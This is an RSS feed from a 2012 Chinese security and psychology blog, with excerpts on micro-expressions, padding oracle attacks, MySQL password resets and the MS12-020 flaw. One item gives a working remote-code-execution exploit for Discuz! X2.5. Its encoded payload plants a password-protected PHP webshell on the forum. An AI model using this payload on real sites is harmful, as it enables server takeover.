<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Trojan&#039;s blog</title>
	<atom:link href="http://blog.x-xox-x.com/feed" rel="self" type="application/rss+xml" />
	<link>http://blog.x-xox-x.com</link>
	<description>IN PCREATE_PROCESS_NOTIFY_ROUTINE NotifyRoutine</description>
	<lastBuildDate>Tue, 08 May 2012 04:30:23 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>忍</title>
		<link>http://blog.x-xox-x.com/341.blog</link>
		<comments>http://blog.x-xox-x.com/341.blog#comments</comments>
		<pubDate>Tue, 08 May 2012 04:30:23 +0000</pubDate>
		<dc:creator>Trojan</dc:creator>
				<category><![CDATA[Default]]></category>

		<guid isPermaLink="false">http://blog.x-xox-x.com/?p=341</guid>
		<description><![CDATA[金银财宝价最高！光阴似剑斩人的刀！ 
日月穿梭催人老！太阳佛三道金光把人熬！ 
马要是有膘算好马！人要想致富多勤劳！ 
在外休交无意友，他摆下窟窿让你瞧！ 
花开花谢年年有！月缺月圆有几遭！ 
忍又忍，饶又饶，忍字头上三把刀！ 
渔樵耕犊都得忍，听我把几样个忍说个根苗：

]]></description>
		<wfw:commentRss>http://blog.x-xox-x.com/341.blog/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Discuz! X2.5 远程代码执行漏洞及EXP</title>
		<link>http://blog.x-xox-x.com/333.blog</link>
		<comments>http://blog.x-xox-x.com/333.blog#comments</comments>
		<pubDate>Fri, 27 Apr 2012 06:40:16 +0000</pubDate>
		<dc:creator>Trojan</dc:creator>
				<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://blog.x-xox-x.com/?p=333</guid>
		<description><![CDATA[1.注册任意账户 2.登陆用户，发表blog日志（注意是日志） 
3.添加图片，选择网络图片，地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 
4.访问日志，论坛根目录下生成demo.php，一句发密码C
]]></description>
		<wfw:commentRss>http://blog.x-xox-x.com/333.blog/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>黑龙江地区招收渗透人才</title>
		<link>http://blog.x-xox-x.com/331.blog</link>
		<comments>http://blog.x-xox-x.com/331.blog#comments</comments>
		<pubDate>Tue, 24 Apr 2012 03:16:42 +0000</pubDate>
		<dc:creator>Trojan</dc:creator>
				<category><![CDATA[Default]]></category>

		<guid isPermaLink="false">http://blog.x-xox-x.com/?p=331</guid>
		<description><![CDATA[黑龙江地区招收渗透测试工程师

要求：
1.asp,php,jsp,asp.net等脚本语言至少熟悉一种（有过脚本漏洞挖掘0day经验的优先）
2.具有强烈的安全意识，强烈的保密意识。
3.熟悉网络攻防技术，windows linux等操作系统。
4.有工作经验或者渗透经验的优先。

联系邮箱 84898658@qq.com
]]></description>
		<wfw:commentRss>http://blog.x-xox-x.com/331.blog/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>“微反应研究”揭秘神奇”读脸拆谎” 记者现场体验</title>
		<link>http://blog.x-xox-x.com/322.blog</link>
		<comments>http://blog.x-xox-x.com/322.blog#comments</comments>
		<pubDate>Mon, 26 Mar 2012 01:43:11 +0000</pubDate>
		<dc:creator>Trojan</dc:creator>
				<category><![CDATA[Micro expression]]></category>

		<guid isPermaLink="false">http://blog.x-xox-x.com/?p=322</guid>
		<description><![CDATA[撒谎不脸红难不倒善于掩饰自己内心的人，但“演技”再高超，微小的动作变化还是会泄露他的真实想法。拆谎主要就是依靠这些“一闪而过”的表情和肢体反应。
小林是一家餐饮企业的“少东家”，他非常努力，不过能力比较有限。他要确立自己的自信和别人对他的认可，想动用资金进行一些高风险高回报的投资，但是他母亲却认为应在传统的餐饮企业方面扎实经营。
小林对外界宣称，母亲很信任他，并且很支持他在家族企业中工作，然而母亲总会来他管理的店面查账，小到几千元的账目都会过问。为了弄清楚他是否对母亲的行为感到反感，是否认为母亲的经营理念过时，于是微反应小组的成员对他进行了测试。
小组成员先问了一些基线问题，比如“你叫什么名字”“你妈妈叫什么名字”之类不需要说谎掩饰的问题，他略微思考了一下才回答问题，这时候，他的眼睛是向左看的。而回答问题时，他一直斜靠在沙发上，身体表现出一种放松的状态。
]]></description>
		<wfw:commentRss>http://blog.x-xox-x.com/322.blog/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>微反映测试实录</title>
		<link>http://blog.x-xox-x.com/320.blog</link>
		<comments>http://blog.x-xox-x.com/320.blog#comments</comments>
		<pubDate>Mon, 26 Mar 2012 01:22:26 +0000</pubDate>
		<dc:creator>Trojan</dc:creator>
				<category><![CDATA[Micro expression]]></category>
		<category><![CDATA[微反映]]></category>

		<guid isPermaLink="false">http://blog.x-xox-x.com/?p=320</guid>
		<description><![CDATA[犯罪心理分析、心理测试技术专家、中国人民公安大学教授武伯欣介绍，“微表情”研究是心理学的分支学科，在大学里开设这门课，有助于心理科学的普及，但教授者一定要把认知心理学、情绪心理学作为基础教给学生。“研究微表情，可以作为沟通的技巧，但不要去以此判断人与人之间是否真诚、忠诚，不要借此去试图揭露谎言。否则会搞得人人自危，伤害人际关系。”武伯欣称，“微表情”研究和测谎一样，不能作为法律意义上的证据。]]></description>
		<wfw:commentRss>http://blog.x-xox-x.com/320.blog/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>王勇平答记者问微反应分析</title>
		<link>http://blog.x-xox-x.com/318.blog</link>
		<comments>http://blog.x-xox-x.com/318.blog#comments</comments>
		<pubDate>Sat, 24 Mar 2012 03:31:33 +0000</pubDate>
		<dc:creator>Trojan</dc:creator>
				<category><![CDATA[Micro expression]]></category>
		<category><![CDATA[微表情]]></category>

		<guid isPermaLink="false">http://blog.x-xox-x.com/?p=318</guid>
		<description><![CDATA[以下分析，按照视频的时间顺序进行拆解和整理。

1、正式开始前，据现场记者的介绍，王先鞠了一躬，随后坐下。
2、王坐下后做出一些动作：调整话筒的位置，并不断与主席台面对的人群中某人交谈，确认后竖起大拇指。这些细微动作，意在通过互动和肯定性行为拉近对话双方的心理距离。
3、正式开始后，王站起，询问“要不要我站起来说？
此时，王的表情呈恐惧类形态。
可见皱眉纹；角度问题，可见左侧眉头略有上扬；上眼睑提升暴露较多虹膜面积。脸颊隆起；有鼻唇沟；嘴角轻微向两侧后方拉开（证明有上唇提升和颧大肌运动），这些属于笑容的下半脸特征。但是在笑容中，上半脸的眼睛周围特征有效性优先级别更高（通常理解为更难伪装），所以这样的表情形态缺少了笑容的必要形态特征，说明这是试图表达友善和诚恳的伪装笑容，结合上半脸形态特征，可判断实为恐惧类表情。
]]></description>
		<wfw:commentRss>http://blog.x-xox-x.com/318.blog/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>张绍刚PK刘俐俐：姜振宇微表情分析张绍刚心理</title>
		<link>http://blog.x-xox-x.com/316.blog</link>
		<comments>http://blog.x-xox-x.com/316.blog#comments</comments>
		<pubDate>Fri, 23 Mar 2012 04:23:27 +0000</pubDate>
		<dc:creator>Trojan</dc:creator>
				<category><![CDATA[Micro expression]]></category>
		<category><![CDATA[微表情]]></category>

		<guid isPermaLink="false">http://blog.x-xox-x.com/?p=316</guid>
		<description><![CDATA[在《非你莫属》节目中，主持人张绍刚和选手刘俐俐的表现引发人们众多争议。据该栏目制片人和部分评审嘉宾透露，本段视频录制全过程超过一小时，剪辑后播出18分钟，因此画面、对话和内容逻辑的连续程度无法充分还原，故不能仅仅因为这段视频，就对人格、立场、道德、专业水平等属性做出是非、高低性评价或判断，而只能就各方表现进行描述性解读。此文没有倾向性，仅仅是技术讨论，旨在和大家交流。


 
　　1.01"05"，张听到“英雄双行体”时，扬眉+确认式提问=惊讶类情绪，表示没听说过；身体后仰+皱眉（有皱眉纹）+上眼睑并未等幅提升=厌恶类情绪，表示排斥。
 
　　2.01"05"-01"08"，张确认式提问后，右侧眼动2次+同步眨眼3次，伴随“莎士比亚？”语言=质疑和不解，可确认上一条的惊讶类情绪。]]></description>
		<wfw:commentRss>http://blog.x-xox-x.com/316.blog/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>忘记MySQLroot密码的解决方案</title>
		<link>http://blog.x-xox-x.com/313.blog</link>
		<comments>http://blog.x-xox-x.com/313.blog#comments</comments>
		<pubDate>Mon, 19 Mar 2012 07:57:55 +0000</pubDate>
		<dc:creator>Trojan</dc:creator>
				<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://blog.x-xox-x.com/?p=313</guid>
		<description><![CDATA[在实际操作中忘记MySQL root密码是一件令人很头痛的事情，不要急以下的文章就是介绍MySQLroot密码忘记的时候解决方案，我们可以对其进行如下的步骤重新设置，以下就是文章的详细内容描述。首先确认服务器出于安全的状态，也就是没有人能够任意地连接MySQL数据库。因为在重新设置MySQL的root密码的期间，MySQL数据库完全出于没有密码保护的状态下，其他的用户也可以任意地登录和修改MySQL的信息。可以采用将MySQL对外的端口封闭，并且停止Apache以及所有的用户进程的方法实现服务器的准安全状态。最安全的状态是到服务器的Console上面操作，并且拔掉网线。]]></description>
		<wfw:commentRss>http://blog.x-xox-x.com/313.blog/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>关于MS12-020的非专业分析</title>
		<link>http://blog.x-xox-x.com/307.blog</link>
		<comments>http://blog.x-xox-x.com/307.blog#comments</comments>
		<pubDate>Fri, 16 Mar 2012 01:41:46 +0000</pubDate>
		<dc:creator>Trojan</dc:creator>
				<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://blog.x-xox-x.com/?p=307</guid>
		<description><![CDATA[本文末尾将付上MS12-020真正的PoC，编写语言为ruby和python两个版本的，还有一个exe程序，均不需要什么freerdp包之类的东西。
Sabu写的那个不是MS12-020的shellcode，而是2008年Apache 1.2.19的远程命令执行漏洞的EXP修改来的。真正的PoC除了本文帖子，其他的地方还真没流传出来。
新闻把这个炒作起来，完全是在微软推送补丁以后看漏洞的介绍和波及范围而炒作的。
PoC以后肯定会有人有更好更傻瓜化的或者GUI版本的，因为既然有漏洞的文件知道了，就会有人根据分析有漏洞的文件写出shellcode，不过暂时本论坛的本帖子的PoC恐怕是网上为数不多的可用的真实的PoC。
]]></description>
		<wfw:commentRss>http://blog.x-xox-x.com/307.blog/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Padding Oracle Attack实例分析</title>
		<link>http://blog.x-xox-x.com/305.blog</link>
		<comments>http://blog.x-xox-x.com/305.blog#comments</comments>
		<pubDate>Tue, 13 Mar 2012 10:16:48 +0000</pubDate>
		<dc:creator>Trojan</dc:creator>
				<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://blog.x-xox-x.com/?p=305</guid>
		<description><![CDATA[在讨论PadBuster之前，我们先来简单讨论一下典型的Padding Oracle Attack基础。故名思义，Padding Oracle Attack背后的关键性概念便是加/解密时的填充（Padding）。明文信息可以是任意长度，但是块状加密算法需要所有的信息都由一定数量的数据块组成。为了满足这样的需求，便需要对明文进行填充，这样便可以将它分割为完整的数据块。
加密时可以使用多种填充规则，但最常见的填充方式之一是在PKCS#5标准中定义的规则。PCKS#5的填充方式为：明文的最后一个数据块包含N个字节的填充数据（N取决于明文最后一块的数据长度）。下图是一些示例，展示了不同长度的单词（FIG、BANANA、AVOCADO、PLANTAIN、PASSIONFRUIT）以及它们使用PKCS#5填充后的结果（每个数据块为8字节长）。

]]></description>
		<wfw:commentRss>http://blog.x-xox-x.com/305.blog/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

